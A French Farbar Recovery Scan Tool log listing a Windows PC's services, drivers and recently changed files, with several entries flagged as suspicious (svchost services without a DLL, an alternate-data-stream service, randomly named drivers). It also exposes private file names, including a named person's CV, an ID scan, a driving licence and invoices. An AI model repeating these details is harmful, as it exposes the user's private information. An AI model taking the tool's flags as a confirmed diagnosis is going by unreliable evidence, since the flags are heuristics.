R2 BTDevManager; C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTDevMgr.exe [98816 2014-10-11] () [Fichier non signé]
S2 CG6Service; C:\Program Files\CyberGhost 6\CyberGhost.Service.exe [232528 2017-08-31] (CyberGhost S.A.)
S2 Cluseywreph; C:\Windows\system32\svchost.exe [38792 2014-10-29] (Microsoft Corporation) <==== ATTENTION (pas de ServiceDLL)
S2 Cluseywreph; C:\Windows\SysWOW64\svchost.exe [33088 2014-10-29] (Microsoft Corporation) <==== ATTENTION (pas de ServiceDLL)
S3 FLEXnet Licensing Service; C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [654848 2016-03-09] (Macrovision Europe Ltd.) [Fichier non signé]
R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [255040 2014-08-25] (WildTangent)
S2 GubedZL; C:\Windows\SysWOW64\svchost.exe [33088 2014-10-29] (Microsoft Corporation) <==== ATTENTION (pas de ServiceDLL)
S2 GubZL; C:\Windows\SysWOW64\svchost.exe [33088 2014-10-29] (Microsoft Corporation) <==== ATTENTION (pas de ServiceDLL)
S3 hpqcaslwmiex; C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [1031704 2016-06-03] (HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [333688 2018-06-13] (HP Inc.)
R2 HPWMISVC; C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe [509192 2014-09-02] (Hewlett-Packard Development Company, L.P.)
R2 HWDeviceService64.exe; C:\ProgramData\DatacardService\HWDeviceService64.exe [351824 2013-02-06] ()
R2 iedvutils; C:\Program Files (x86)\Explorer\iedvutils.exe [55992 2017-03-01] ()
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [318568 2014-10-15] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-01] (Intel(R) Corporation) [Fichier non signé]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel(R) Corporation)
R2 Mobile Broadband HL Service; C:\ProgramData\MobileBrServ\mbbservice.exe [239184 2014-02-15] ()
S2 MTN Online. RunOuc; C:\Program Files (x86)\MTN Online\UpdateDog\ouc.exe [656976 2013-05-21] ()
R2 NoIPDUCService4; C:\Program Files (x86)\No-IP\ducservice.exe [12288 2015-07-20] () [Fichier non signé]
R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [88064 2014-03-28] (Softex Inc.) [Fichier non signé]
R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [389896 2014-04-14] ()
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [291032 2014-08-19] (Realtek Semiconductor)
R2 SpliCamService; C:\Program Files (x86)\SplitCam\SplitCamService.exe [321064 2016-10-19] (SplitCam Co.)
R2 ss_conn_service; C:\Program Files\SAMSUNG\USB Drivers\25_escape\conn\ss_conn_service.exe [743688 2014-12-03] (DEVGURU Co., LTD.)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [Fichier non signé]
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [191728 2014-09-17] (Synaptics Incorporated)
S2 Themes; C:\Windows\system32\themeservice.dll [59392 2014-10-29] (Microsoft Corporation) [DependOnService: iThemes5]<==== ATTENTION
R2 TorchCrashHandler; C:\Users\pc1\AppData\Local\Torch\Update\TorchCrashHandler.exe [1216520 2014-06-02] (TorchMedia Inc.) <==== ATTENTION
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation)
R2 wiasvc; C:\ProgramData\Microsoft\Windows\Image\capCADF.tmp:ad [212994 ] () [Fichier non signé] <==== ATTENTION <==== ATTENTION
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation)
S2 ed2kidle; "C:\Program Files (x86)\amuleCe\ed2k.exe" -downloadwhenidle [X]
S3 klvssbrigde64; "C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 16.0.1\x64\vssbridge64.exe" [X]
===================== Pilotes (Avec liste blanche) ======================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
S3 aswTap; C:\Windows\system32\DRIVERS\aswTap.sys [53904 2017-12-05] (The OpenVPN Project)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [91912 2013-11-12] (CyberLink)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd.)
R3 GPIO; C:\Windows\System32\drivers\iaiogpioe.sys [31232 2013-11-11] (Intel Corporation)
S3 huawei_wwanecm; C:\Windows\system32\DRIVERS\ew_juwwanecm.sys [245760 2013-05-28] (Huawei Technologies Co., Ltd.)
S3 hwdatacard; C:\Windows\system32\DRIVERS\ZDDriver.sys [122496 2010-01-19] (ZD Secret Incorporated)
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-01-27] (REALiX(tm))
R0 MBI; C:\Windows\System32\drivers\MBI.sys [29464 2014-01-23] (Intel Corporation)
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [80160 2015-02-13] (McAfee, Inc.)
S1 MpKsl13259c42; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{B6017820-EC4E-4598-B3F1-428452ECCF27}\MpKsl13259c42.sys [58120 2018-07-26] () [Fichier non signé]
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [27520 2007-05-14] (Research In Motion Limited)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [294104 2014-08-19] (Realtek Semiconductor Corp.)
R3 RtkBtFilter; C:\Windows\system32\DRIVERS\RtkBtfilter.sys [580824 2014-09-10] (Realtek Semiconductor Corporation)
R3 RTWlanE; C:\Windows\system32\DRIVERS\rtwlane.sys [3593432 2014-10-08] (Realtek Semiconductor Corporation )
R3 scvad_simple; C:\Windows\system32\drivers\SplitCamAudio.sys [23552 2016-08-02] (Windows (R) Win 7 DDK provider)
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [32496 2014-09-17] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [33008 2014-09-17] (Synaptics Incorporated)
R3 splitcam_hd_driver; C:\Windows\system32\DRIVERS\splitcam_hd_driver.sys [37600 2016-08-02] (Windows (R) Win 7 DDK provider)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd.)
R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Corporation)
S3 wdm_usb; C:\Windows\system32\DRIVERS\usb2ser.sys [159936 2016-08-16] (MBB)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2013-07-22] (Hewlett-Packard Development Company, L.P.)
S1 bindrllc; \??\C:\Windows\system32\drivers\bindrllc.sys [X]
S1 cguzgitl; \??\C:\Windows\system32\drivers\cguzgitl.sys [X]
U2 CWASRE; pas de ImagePath
S3 hmatap; \SystemRoot\system32\DRIVERS\hmatap.sys [X]
S1 lrbfpuox; \??\C:\Windows\system32\drivers\lrbfpuox.sys [X]
S1 okrsbjeh; \??\C:\Windows\system32\drivers\okrsbjeh.sys [X]
U2 snare; pas de ImagePath
U2 WinSnare; pas de ImagePath
S1 yahpbvdi; \??\C:\Windows\system32\drivers\yahpbvdi.sys [X]
==================== NetSvcs (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
==================== Un mois - Créés - fichiers et dossiers ========
(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)
2018-07-26 23:42 - 2018-07-26 23:51 - 000044324 _____ C:\Users\pc1\Desktop\FRST.txt
2018-07-26 23:42 - 2018-07-26 23:50 - 000000000 ____D C:\FRST
2018-07-26 23:40 - 2018-07-26 23:40 - 002412544 _____ (Farbar) C:\Users\pc1\Desktop\farbar-recovery-scan-tool-64-bits_19-07-2018_fr_432987_64.exe
2018-07-26 18:29 - 2007-03-23 16:55 - 000035928 _____ (Adobe Systems Incorporated.) C:\Windows\system32\AdobePDF64.dll
2018-07-23 19:13 - 2018-07-23 19:15 - 066817040 _____ (Matisoft ) C:\Users\pc1\Downloads\Contact-Express (1).exe
2018-07-23 18:43 - 2018-07-23 18:44 - 002901585 _____ C:\Users\pc1\Downloads\bvs_ag_2015_08-09.pdf
2018-07-23 18:32 - 2018-07-23 18:32 - 001412436 _____ C:\Users\pc1\Downloads\organisme-habilite-sst (3).pdf
2018-07-23 16:28 - 2018-07-23 16:29 - 002309248 _____ C:\Users\pc1\Downloads\semaineindustrie2018.0723.xlsx
2018-07-23 16:27 - 2018-07-23 16:27 - 000700326 _____ C:\Users\pc1\Downloads\00_Texte_Revue_Sante_1er_Novembre_2010_.pdf
2018-07-23 16:22 - 2018-07-23 16:22 - 013151503 _____ C:\Users\pc1\Downloads\4com-2018.pdf
2018-07-20 18:55 - 2018-07-20 18:55 - 000000295 _____ C:\Users\pc1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Corbeille.lnk
2018-07-20 18:51 - 2018-07-25 20:13 - 000000000 ____D C:\Users\pc1\Desktop\app
2018-07-20 00:27 - 2018-07-20 00:27 - 000000132 _____ C:\Users\pc1\AppData\Roaming\Préfs Format PNG Adobe CS6
2018-07-19 18:15 - 2018-07-19 18:16 - 000410398 _____ C:\Users\pc1\Downloads\declaration de contrat de pret.pdf
2018-07-19 14:37 - 2018-06-20 21:01 - 007398232 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2018-07-19 14:37 - 2018-06-15 04:01 - 004169216 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2018-07-19 14:37 - 2018-06-12 09:00 - 022374248 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2018-07-19 14:37 - 2018-06-12 08:57 - 019790760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2018-07-19 14:37 - 2018-06-11 17:55 - 025744896 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2018-07-19 14:37 - 2018-06-11 17:06 - 005779968 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2018-07-19 14:37 - 2018-06-11 16:36 - 015283200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2018-07-19 14:37 - 2018-06-09 17:40 - 020286976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2018-07-19 14:37 - 2018-06-09 16:37 - 004496384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2018-07-19 14:37 - 2018-06-09 16:36 - 013680128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2018-07-19 14:36 - 2018-06-20 20:44 - 001676064 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2018-07-19 14:36 - 2018-06-20 20:44 - 001536120 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2018-07-19 14:36 - 2018-06-20 19:48 - 000095744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdk8.sys
2018-07-19 14:36 - 2018-06-20 19:48 - 000027136 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fxppm.sys
2018-07-19 14:36 - 2018-06-20 17:58 - 000098816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\intelppm.sys
2018-07-19 14:36 - 2018-06-20 17:58 - 000098816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdppm.sys
2018-07-19 14:36 - 2018-06-20 17:58 - 000092672 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\processr.sys
2018-07-19 14:36 - 2018-06-11 17:36 - 003119616 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2018-07-19 14:36 - 2018-06-11 17:14 - 000576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2018-07-19 14:36 - 2018-06-11 17:04 - 000794624 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2018-07-19 14:36 - 2018-06-11 16:39 - 001033216 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2018-07-19 14:36 - 2018-06-11 16:31 - 000809472 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2018-07-19 14:36 - 2018-06-11 16:22 - 003241472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2018-07-19 14:36 - 2018-06-11 16:11 - 001545216 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2018-07-19 14:36 - 2018-06-11 15:59 - 000800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2018-07-19 14:36 - 2018-06-09 17:26 - 002712064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2018-07-19 14:36 - 2018-06-09 17:09 - 000498176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2018-07-19 14:36 - 2018-06-09 16:59 - 000662016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2018-07-19 14:36 - 2018-06-09 16:37 - 000880640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2018-07-19 14:36 - 2018-06-09 16:32 - 000696320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2018-07-19 14:36 - 2018-06-09 16:11 - 002767872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2018-07-19 14:36 - 2018-06-09 16:08 - 001313792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2018-07-19 14:36 - 2018-06-09 16:06 - 000710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2018-07-19 14:36 - 2018-06-09 03:47 - 002176072 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2018-07-19 14:36 - 2018-06-09 02:44 - 001565528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2018-07-19 14:36 - 2018-06-08 19:26 - 000440832 _____ (Microsoft Corporation) C:\Windows\system32\zipfldr.dll
2018-07-19 14:36 - 2018-06-08 18:54 - 000656384 _____ (Microsoft Corporation) C:\Windows\system32\dnsapi.dll
2018-07-19 14:36 - 2018-06-08 18:53 - 000252416 _____ (Microsoft Corporation) C:\Windows\system32\dnsrslvr.dll
2018-07-19 14:36 - 2018-06-08 18:07 - 000404992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\zipfldr.dll
2018-07-19 14:36 - 2018-06-08 17:44 - 000499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnsapi.dll
2018-07-19 14:36 - 2018-06-07 19:51 - 000074240 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mpsdrv.sys
2018-07-19 14:36 - 2018-05-24 22:29 - 002449752 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2018-07-19 14:36 - 2018-05-24 22:29 - 000428888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2018-07-19 14:36 - 2018-05-15 09:42 - 000590680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fvevol.sys
2018-07-19 14:36 - 2018-05-04 00:02 - 000439640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2018-07-19 14:36 - 2018-05-04 00:02 - 000325456 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBXHCI.SYS
2018-07-19 14:36 - 2018-05-04 00:02 - 000187728 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\UCX01000.SYS
2018-07-19 14:36 - 2018-04-26 14:43 - 000918296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000065880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-private-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000021848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-math-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000018776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-multibyte-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000017240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-string-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000017240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-stdio-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000015704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-runtime-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000015192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-convert-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000013656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-time-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000013152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-filesystem-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000012120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-process-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000012120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-conio-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000011608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-utility-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000011608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-locale-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000011608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-heap-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000011608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-environment-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000998912 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000063832 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-private-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000020824 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-math-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000019288 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-multibyte-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000017752 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-string-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000017752 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-stdio-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000016216 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-runtime-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000015704 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-convert-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000014168 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-time-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000013656 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-filesystem-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-conio-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000012632 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-process-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000012120 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-utility-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000012120 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-locale-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000012120 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-heap-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000012120 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-environment-l1-1-0.dll
2018-07-19 14:36 - 2018-04-25 18:38 - 000243200 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2018-07-18 15:02 - 2018-07-18 15:02 - 005208782 _____ C:\Users\pc1\Downloads\guide-2018-bat-final.pdf
2018-07-18 14:46 - 2018-07-18 14:46 - 000280947 _____ C:\Users\pc1\Downloads\Liste des membres du Conseil-2016-2021_27_13.07.18.pdf
2018-07-18 14:30 - 2018-07-18 14:30 - 003836419 _____ C:\Users\pc1\Downloads\VEIGY+-+ECHO_188.pdf
2018-07-17 20:42 - 2018-07-17 20:42 - 008168015 _____ C:\Users\pc1\Downloads\guideville+2017.pdf
2018-07-17 20:40 - 2018-03-27 00:24 - 000029352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aspnet_counters.dll
2018-07-17 20:40 - 2018-03-27 00:24 - 000019088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcr100_clr0400.dll
2018-07-17 20:40 - 2018-03-27 00:17 - 000030888 _____ (Microsoft Corporation) C:\Windows\system32\aspnet_counters.dll
2018-07-17 20:40 - 2018-03-27 00:17 - 000019088 _____ (Microsoft Corporation) C:\Windows\system32\msvcr100_clr0400.dll
2018-07-16 12:08 - 2018-07-16 12:10 - 020994333 _____ C:\Users\pc1\Downloads\sup Mut 2018 (2).pdf
2018-07-16 12:03 - 2018-07-16 12:03 - 001412436 _____ C:\Users\pc1\Downloads\organisme-habilite-sst (2).pdf
2018-07-15 20:34 - 2018-06-12 20:01 - 000149632 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2018-07-15 20:34 - 2018-06-08 14:15 - 002860032 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2018-07-15 20:34 - 2018-06-08 14:15 - 001602048 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000783872 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000680960 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000612352 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000470016 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000443392 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000301056 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000246272 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2018-07-13 19:31 - 2018-07-13 19:31 - 000004477 _____ C:\Users\pc1\Downloads\LoaderExportV3 (1).swf
2018-07-13 19:23 - 2018-07-13 19:23 - 000004477 _____ C:\Users\pc1\Downloads\LoaderExportV3.swf
2018-07-13 19:18 - 2018-07-13 19:18 - 001412436 _____ C:\Users\pc1\Downloads\organisme-habilite-sst (1).pdf
2018-07-13 19:17 - 2018-07-13 19:17 - 001412436 _____ C:\Users\pc1\Downloads\organisme-habilite-sst.pdf
2018-07-12 11:56 - 2018-07-12 11:56 - 008239366 _____ C:\Users\pc1\Downloads\05 Renoult PA. Nouvelles utilisations du systeme information médical des forces. Médecine et Armées 2017-2-129-36.pdf
2018-07-10 09:27 - 2018-07-10 09:27 - 000000165 ____H C:\Users\pc1\Documents\~$Rapport Maggi 2016.pptx
2018-07-09 22:16 - 2018-07-09 22:16 - 000319809 _____ C:\Users\pc1\Downloads\CURRICULUM VITAE DIANE ASTRIDE K. -ASSISTANTE BUSINESS DEVELOPER.pdf
2018-07-09 22:16 - 2018-07-09 22:16 - 000109149 _____ C:\Users\pc1\Downloads\Lettre de motivation Diane K. Business Developer.pdf
2018-07-09 18:12 - 2018-07-09 18:12 - 000285120 _____ C:\Users\pc1\Downloads\facture orange (1).pdf
2018-07-09 18:12 - 2018-07-09 18:12 - 000280488 _____ C:\Users\pc1\Downloads\permi raf.pdf
2018-07-09 18:04 - 2018-07-09 18:05 - 000259990 _____ C:\Users\pc1\Downloads\ci raf.pdf
2018-07-07 23:33 - 2018-07-07 23:33 - 000738961 _____ C:\Users\pc1\Downloads\20171017210857.pdf
2018-07-03 12:42 - 2018-07-03 12:44 - 020994333 _____ C:\Users\pc1\Downloads\sup Mut 2018 (1).pdf
2018-07-03 00:07 - 2018-07-03 00:07 - 000438996 _____ C:\Users\pc1\Downloads\organisme-habilite-aps-asd.pdf
2018-07-02 23:43 - 2018-07-02 23:43 - 003016173 _____ C:\Users\pc1\Downloads\BO n° 281 (avril 2018).pdf
==================== Un mois - Modifiés - fichiers et dossiers ========
(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)
2018-07-26 23:16 - 2017-02-02 20:53 - 000000000 ____D C:\Program Files\Opera
2018-07-26 23:12 - 2017-05-22 19:30 - 000000000 ____D C:\Users\pc1\Documents\Youcam
2018-07-26 23:12 - 2017-02-20 15:38 - 000000000 _____ C:\Users\Public\Documents\temp.dat
2018-07-26 23:09 - 2013-08-22 15:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-07-26 23:04 - 2015-05-27 17:42 - 000000000 ____D C:\Users\pc1
2018-07-26 22:59 - 2015-08-27 19:22 - 000000000 ____D C:\Users\pc1\AppData\Local\ClassicShell
2018-07-26 22:54 - 2017-05-04 11:18 - 000000000 ____D C:\Users\pc1\AppData\Local\background_fault
2018-07-26 21:26 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\system32\NDF
2018-07-26 19:19 - 2017-03-26 22:26 - 000003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-813913080-1538114768-4122880109-1001
2018-07-26 18:01 - 2015-05-27 17:43 - 000000000 ____D C:\Users\pc1\AppData\Roaming\Adobe
2018-07-26 16:19 - 2016-01-24 23:39 - 000000000 ____D C:\Windows\system32\MRT
2018-07-26 15:59 - 2016-01-24 23:39 - 134675576 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2018-07-26 15:31 - 2018-01-03 22:13 - 000000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2018-07-26 15:31 - 2015-09-10 12:52 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2018-07-26 08:04 - 2015-11-10 18:13 - 000000000 ____D C:\Users\pc1\AppData\Roaming\vlc
2018-07-25 20:10 - 2016-01-21 11:05 - 000000000 ____D C:\Users\pc1\AppData\Roaming\VIP72 Socks Client
2018-07-25 20:09 - 2016-01-17 17:42 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2018-07-23 19:17 - 2018-03-28 23:45 - 000000000 ____D C:\Users\pc1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Matisoft
2018-07-23 16:42 - 2015-05-27 17:42 - 000000000 ____D C:\Users\pc1\AppData\Local\Packages
2018-07-22 19:24 - 2017-06-02 20:29 - 000000000 ____D C:\Windows\CbsTemp
2018-07-20 20:57 - 2013-08-22 14:36 - 000000000 ____D C:\Windows\Inf
2018-07-19 23:21 - 2013-08-22 15:44 - 005374488 _____ C:\Windows\system32\FNTCACHE.DAT
2018-07-19 23:12 - 2013-08-22 16:36 - 000000000 ___RD C:\Windows\ToastData
2018-07-19 13:55 - 2018-05-09 19:53 - 000685568 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2018-07-18 20:15 - 2018-05-25 03:57 - 005130519 _____ C:\Users\pc1\Downloads\video.mp4
2018-07-18 12:23 - 2016-01-25 01:54 - 000000000 ____D C:\Windows\system32\appraiser
2018-07-16 23:02 - 2015-09-10 12:20 - 000563832 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2018-07-11 22:46 - 2018-05-26 08:38 - 000000000 ____D C:\Users\pc1\Documents\Fichiers Outlook
2018-07-10 09:15 - 2016-07-07 09:33 - 000000000 ____D C:\Users\pc1\Documents\fan DANGO-FANXTRA
2018-07-06 11:51 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\tracing
